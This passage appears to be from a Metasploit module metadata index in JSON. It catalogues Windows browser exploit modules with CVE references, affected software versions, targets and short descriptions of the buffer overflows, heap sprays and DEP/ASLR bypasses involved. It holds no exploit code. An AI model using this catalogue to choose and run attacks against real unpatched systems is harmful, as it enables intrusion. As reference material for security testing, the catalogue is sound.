"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/synactis_connecttosynactis_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/systemrequirementslab_unsafe": {
"name": "Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method",
"full_name": "exploit/windows/browser/systemrequirementslab_unsafe",
"rank": 600,
"disclosure_date": "2008-10-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows attackers to execute code via an unsafe method in\n Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)",
"references": [
"CVE-2008-4385",
"OSVDB-50122",
"US-CERT-VU-166651"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/systemrequirementslab_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/teechart_pro": {
"name": "TeeChart Professional ActiveX Control Trusted Integer Dereference",
"full_name": "exploit/windows/browser/teechart_pro",
"rank": 300,
"disclosure_date": "2011-08-11",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n sending an overly large/negative integer value to the AddSeries() property of\n TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n value and is later directly trusted and called upon.\n\n This module has been designed to bypass DEP only under IE8 with Java support. Multiple\n versions (including the latest version) are affected by this vulnerability that date\n back to as far as 2001.\n\n The following controls are vulnerable:\n\n TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n The controls are deployed under several SCADA based systems including:\n\n Unitronics OPC server v1.3;\n BACnet Operator Workstation Version 1.0.76",
"references": [
"OSVDB-74446",
"URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP0-SP3 (IE6/IE7)",
"Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)",
"Windows 7 + JAVA + DEP bypass (IE8)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/teechart_pro.rb",
"is_install_path": true,
"ref_name": "windows/browser/teechart_pro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/tom_sawyer_tsgetx71ex552": {
"name": "Tom Sawyer Software GET Extension Factory Remote Code Execution",
"full_name": "exploit/windows/browser/tom_sawyer_tsgetx71ex552",
"rank": 300,
"disclosure_date": "2011-05-03",
"type": "exploit",
"author": [
"Elazar Broad",
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll\n ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect\n initialization under Internet Explorer.\n\n While the Tom Sawyer GET Extension Factory is installed with some versions of VMware\n Infrastructure Client, this module has been tested only with the versions installed\n with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX\n control tested is tsgetx71ex553.dll, version 5.5.3.238.\n\n This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The\n dll is installed by default with the Embarcadero software, and loaded by the targeted\n ActiveX.",
"references": [
"CVE-2011-2217",
"OSVDB-73211",
"BID-48099",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7 SP1"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb",
"is_install_path": true,
"ref_name": "windows/browser/tom_sawyer_tsgetx71ex552",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/trendmicro_extsetowner": {
"name": "Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution",
"full_name": "exploit/windows/browser/trendmicro_extsetowner",
"rank": 300,
"disclosure_date": "2010-08-25",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a remote code execution vulnerability in Trend Micro\n Internet Security Pro 2010 ActiveX.\n When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-3189",
"OSVDB-67561",
"ZDI-10-165",
"EDB-14878"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/trendmicro_extsetowner.rb",
"is_install_path": true,
"ref_name": "windows/browser/trendmicro_extsetowner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/trendmicro_officescan": {
"name": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/trendmicro_officescan",
"rank": 300,
"disclosure_date": "2007-02-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-0325",
"OSVDB-33040",
"BID-22585"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/trendmicro_officescan.rb",
"is_install_path": true,
"ref_name": "windows/browser/trendmicro_officescan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/tumbleweed_filetransfer": {
"name": "Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/tumbleweed_filetransfer",
"rank": 500,
"disclosure_date": "2008-04-07",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the vcst_eu.dll\n FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n SecureTransport suite. By sending an overly long string to the\n TransferFile() 'remotefile' function, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2008-1724",
"OSVDB-44252",
"URL-http://www.aushack.com/200708-tumbleweed.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal vcst_eu.dll",
"Windows 2000 Pro English",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/tumbleweed_filetransfer.rb",
"is_install_path": true,
"ref_name": "windows/browser/tumbleweed_filetransfer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ubisoft_uplay_cmd_exec": {
"name": "Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution",
"full_name": "exploit/windows/browser/ubisoft_uplay_cmd_exec",
"rank": 300,
"disclosure_date": "2012-07-29",
"type": "exploit",
"author": [
"Tavis Ormandy <taviso@cmpxchg8b.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"phillips321 <phillips321@phillips321.co.uk>",
"Richard Hicks <scriptmonkeyblog@gmail.com>"
],
"description": "The uplay ActiveX component allows an attacker to execute any command line action.\n User must sign in, unless auto-sign in is enabled and uplay must not already be\n running. Due to the way the malicious executable is served (WebDAV), the module\n must be run on port 80, so please make sure you have enough privilege to do that.\n Ubisoft released patch 2.04 as of Mon 20th July.",
"references": [
"CVE-2012-4177",
"OSVDB-84402",
"URL-https://seclists.org/fulldisclosure/2012/Jul/375",
"URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/ubisoft_uplay_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ultramjcam_openfiledig_bof": {
"name": "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",
"full_name": "exploit/windows/browser/ultramjcam_openfiledig_bof",
"rank": 300,
"disclosure_date": "2012-03-28",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in TRENDnet SecurView Internet\n Camera's ActiveX control. By supplying a long string of data as the sFilter\n argument of the OpenFileDlg() function, it is possible to trigger a buffer\n overflow condition due to WideCharToMultiByte (which converts unicode back to)\n overwriting the stack more than it should, which results arbitrary code execution\n under the context of the user.",
"references": [
"CVE-2012-4876",
"OSVDB-80661",
"EDB-18675"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 7 on Windows Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/ultramjcam_openfiledig_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ultraoffice_httpupload": {
"name": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",
"full_name": "exploit/windows/browser/ultraoffice_httpupload",
"rank": 400,
"disclosure_date": "2008-08-27",
"type": "exploit",
"author": [
"shinnai",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.",
"references": [
"CVE-2008-3878",
"OSVDB-47866",
"BID-30861",
"EDB-6318"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ultraoffice_httpupload.rb",
"is_install_path": true,
"ref_name": "windows/browser/ultraoffice_httpupload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/verypdf_pdfview": {
"name": "VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow",
"full_name": "exploit/windows/browser/verypdf_pdfview",
"rank": 300,
"disclosure_date": "2008-06-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"dean <dean@zerodaysolutions.com>"
],
"description": "The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n because it fails to properly bounds-check user-supplied data before copying\n it into an insufficiently sized memory buffer. An attacker can exploit this issue\n to execute arbitrary code within the context of the affected application.",
"references": [
"CVE-2008-5492",
"OSVDB-49871",
"BID-32313"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/verypdf_pdfview.rb",
"is_install_path": true,
"ref_name": "windows/browser/verypdf_pdfview",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/viscom_movieplayer_drawtext": {
"name": "Viscom Software Movie Player Pro SDK ActiveX 6.8",
"full_name": "exploit/windows/browser/viscom_movieplayer_drawtext",
"rank": 300,
"disclosure_date": "2010-01-12",
"type": "exploit",
"author": [
"shinnai",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\n remote attackers to execute arbitrary code via a long strFontName parameter to the\n DrawText method.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.",
"references": [
"CVE-2010-0356",
"OSVDB-61634",
"EDB-12320"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows IE6-7",
"Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb",
"is_install_path": true,
"ref_name": "windows/browser/viscom_movieplayer_drawtext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/vlc_amv": {
"name": "VLC AMV Dangling Pointer Vulnerability",
"full_name": "exploit/windows/browser/vlc_amv",
"rank": 400,
"disclosure_date": "2011-03-23",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits VLC media player when handling a .AMV file. By flipping\n the 0x41st byte in the file format (video width/height), VLC crashes due to an\n invalid pointer, which allows remote attackers to gain arbitrary code execution.\n The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also,\n please note that IE 8 targets require Java support in order to run properly.",
"references": [
"CVE-2010-3275",
"OSVDB-71277",
"URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files",
"URL-http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6 on XP SP3",
"Internet Explorer 7 on XP SP3",
"Internet Explorer 8 on XP SP3",
"Internet Explorer 7 on Vista"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/vlc_amv.rb",
"is_install_path": true,
"ref_name": "windows/browser/vlc_amv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/vlc_mms_bof": {
"name": "VLC MMS Stream Handling Buffer Overflow",
"full_name": "exploit/windows/browser/vlc_mms_bof",
"rank": 300,
"disclosure_date": "2012-03-15",
"type": "exploit",
"author": [
"Florent Hochwelker",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in VLC media player VLC media player prior\n to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result\n in a stack buffer overflow when handling a malicious MMS URI.\n\n This module uses the browser as attack vector. A specially crafted MMS URI is\n used to trigger the overflow and get flow control through SEH overwrite. Control\n is transferred to code located in the heap through a standard heap spray.\n\n The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.",
"references": [
"CVE-2012-1775",
"OSVDB-80188",
"URL-http://www.videolan.org/security/sa1201.html",
"URL-http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6 on XP SP3",
"Internet Explorer 7 on XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/vlc_mms_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/vlc_mms_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/webdav_dll_hijacker": {
"name": "WebDAV Application DLL Hijacker",
"full_name": "exploit/windows/browser/webdav_dll_hijacker",
"rank": 0,
"disclosure_date": "2010-08-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>",
"jcran <jcran@metasploit.com>"
],
"description": "This module presents a directory of file extensions that can lead to\n code execution when opened from the share. The default EXTENSIONS option\n must be configured to specify a vulnerable application type.",
"references": [
"URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html",
"URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/webdav_dll_hijacker.rb",
"is_install_path": true,
"ref_name": "windows/browser/webdav_dll_hijacker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/webex_ucf_newobject": {
"name": "WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",
"full_name": "exploit/windows/browser/webex_ucf_newobject",
"rank": 400,
"disclosure_date": "2008-08-06",
"type": "exploit",
"author": [
"Tobias Klein",
"Elazar Broad",
"Guido Landi",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-\n based buffer overflow will occur when copying attacker-supplied data using the\n sprintf function.\n\n It is noteworthy that this vulnerability was discovered and reported by multiple\n independent researchers. To quote iDefense's advisory, \"Before this issue was\n publicly reported, at least three independent security researchers had knowledge\n of this issue; thus, it is reasonable to believe that even more people were aware\n of this issue before disclosure.\"\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.",
"references": [
"CVE-2008-3558",
"OSVDB-47344",
"BID-30578",
"EDB-6220",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849",
"URL-http://www.trapkit.de/advisories/TKADV2008-009.txt",
"URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html",
"URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/webex_ucf_newobject.rb",
"is_install_path": true,
"ref_name": "windows/browser/webex_ucf_newobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/wellintech_kingscada_kxclientdownload": {
"name": "KingScada kxClientDownload.ocx ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/wellintech_kingscada_kxclientdownload",
"rank": 400,
"disclosure_date": "2014-01-14",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.\n The ProjectURL property can be abused to download and load arbitrary DLLs from\n arbitrary locations, leading to arbitrary code execution, because of a dangerous\n usage of LoadLibrary. Due to the nature of the vulnerability, this module will work\n only when Protected Mode is not present or not enabled.",
"references": [
"CVE-2013-2827",
"OSVDB-102135",
"BID-64941",
"ZDI-14-011",
"URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb",
"is_install_path": true,
"ref_name": "windows/browser/wellintech_kingscada_kxclientdownload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/winamp_playlist_unc": {
"name": "Winamp Playlist UNC Path Computer Name Overflow",
"full_name": "exploit/windows/browser/winamp_playlist_unc",
"rank": 500,
"disclosure_date": "2006-01-29",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Faithless <rhyskidd@gmail.com>"
],
"description": "This module exploits a vulnerability in the Winamp media player.\n This flaw is triggered when an audio file path is specified, inside a\n playlist, that consists of a UNC path with a long computer name. This\n module delivers the playlist via the browser. This module has only\n been successfully tested on Winamp 5.11 and 5.12.",
"references": [
"CVE-2006-0476",
"OSVDB-22789",
"BID-16410"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winamp 5.12 Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/winamp_playlist_unc.rb",
"is_install_path": true,
"ref_name": "windows/browser/winamp_playlist_unc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/winamp_ultravox": {
"name": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",
"full_name": "exploit/windows/browser/winamp_ultravox",
"rank": 300,
"disclosure_date": "2008-01-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. This vulnerability can be\n exploited from the browser or the Winamp client itself.",
"references": [
"CVE-2008-0065",
"OSVDB-41707",
"BID-27344"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winamp 5.24"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/winamp_ultravox.rb",
"is_install_path": true,
"ref_name": "windows/browser/winamp_ultravox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/windvd7_applicationtype": {
"name": "WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/windvd7_applicationtype",
"rank": 300,
"disclosure_date": "2007-03-20",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n control in InterVideo WinDVD 7. By sending an overly long string\n to the \"ApplicationType()\" property, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2007-0348",
"OSVDB-34315",
"BID-23071"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English ALL",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/browser/windvd7_applicationtype.rb",
"is_install_path": true,
"ref_name": "windows/browser/windvd7_applicationtype",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/winzip_fileview": {
"name": "WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/winzip_fileview",
"rank": 300,
"disclosure_date": "2007-11-02",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n remote attacker to execute arbitrary code on the system. The control contains\n several unsafe methods and is marked safe for scripting and safe for initialization.\n A remote attacker could exploit this vulnerability to execute arbitrary code on the\n victim system. WinZip 10.0 <= Build 6667 are vulnerable.",
"references": [
"CVE-2006-5198",
"OSVDB-30433",
"BID-21060"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/winzip_fileview.rb",
"is_install_path": true,
"ref_name": "windows/browser/winzip_fileview",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/wmi_admintools": {
"name": "Microsoft WMI Administration Tools ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/wmi_admintools",
"rank": 500,
"disclosure_date": "2010-12-21",
"type": "exploit",
"author": [
"WooYun",
"MC <mc@metasploit.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory trust issue in the Microsoft WMI\n Administration tools ActiveX control. When processing a specially crafted\n HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n as a trusted pointer. It makes an indirect call via this pointer which leads\n to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions.\n\n The WMI Administrative Tools are a standalone download & install (linked in the\n references).",
"references": [
"OSVDB-69942",
"CVE-2010-3973",
"BID-45546",
"URL-http://wooyun.org/bug.php?action=view&id=1006",
"URL-http://secunia.com/advisories/42693",
"URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows Universal",
"Debug Target (Crash)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/wmi_admintools.rb",
"is_install_path": true,
"ref_name": "windows/browser/wmi_admintools",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/x360_video_player_set_text_bof": {
"name": "X360 VideoPlayer ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/x360_video_player_set_text_bof",
"rank": 300,
"disclosure_date": "2015-01-30",
"type": "exploit",
"author": [
"Rh0",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.",
"references": [
"EDB-35948",
"URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/x360_video_player_set_text_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/xmplay_asx": {
"name": "XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow",
"full_name": "exploit/windows/browser/xmplay_asx",
"rank": 400,
"disclosure_date": "2006-11-21",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n The vulnerability is caused due to a boundary error within\n the parsing of playlists containing an overly long file name.\n This module uses the ASX file format.",
"references": [
"CVE-2006-6063",
"OSVDB-30537",
"BID-21206",
"URL-http://secunia.com/advisories/22999/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English SP4",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/xmplay_asx.rb",
"is_install_path": true,
"ref_name": "windows/browser/xmplay_asx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/yahoomessenger_fvcom": {
"name": "Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/yahoomessenger_fvcom",
"rank": 300,
"disclosure_date": "2007-08-30",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string\n to the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2007-4515",
"OSVDB-37739",
"BID-25494",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
